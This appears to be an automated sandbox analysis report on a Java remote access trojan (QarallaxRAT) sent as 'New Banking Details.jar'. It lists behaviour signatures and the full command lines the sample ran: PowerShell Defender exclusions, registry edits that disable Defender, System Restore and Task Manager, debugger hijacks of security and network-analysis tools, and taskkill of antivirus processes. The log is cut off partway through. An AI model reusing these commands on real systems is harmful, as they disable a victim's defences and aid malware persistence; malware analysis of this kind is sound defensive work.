Analysis
-
max time kernel
149s -
max time network
144s -
platform
windows7_x64 -
resource
win7 -
submitted
06-08-2020 07:45
General
-
Target
New Banking Details.jar
-
Size
410KB
-
MD5
7ff8c97e2fe1c972876ee4cc84238074
-
SHA1
fb1d4dff5cedba4dc4eb0ddf662fc9be2d39e696
-
SHA256
d4a142b9eba6dff66deadaea2777b5ce1d7fc551f94b5e7f87ba6a84709106c9
-
SHA512
0531582de07c475fa4ebe358d5336ed810fcdb0adbcbcd8738a66b4aa7cd66eeb11837ce63cd534a23ff277f8a5d50e7a806675379f97e8e34cf45ede9d86759
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
-
Qarallax RAT support DLL 1 IoCs
-
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Drops desktop.ini file(s) 4 IoCs
-
Drops file in System32 directory 2 IoCs
-
Kills process with taskkill 19 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 100 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 798 IoCs
-
Views/modifies file attributes 1 TTPs 8 IoCs
Processes
-
C:\Windows\system32\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\New Banking Details.jar"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib -s -r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +s +r C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Admin\hmJMe2⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class2⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵
-
C:\Windows\system32\cmd.execmd.exe2⤵
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵
-
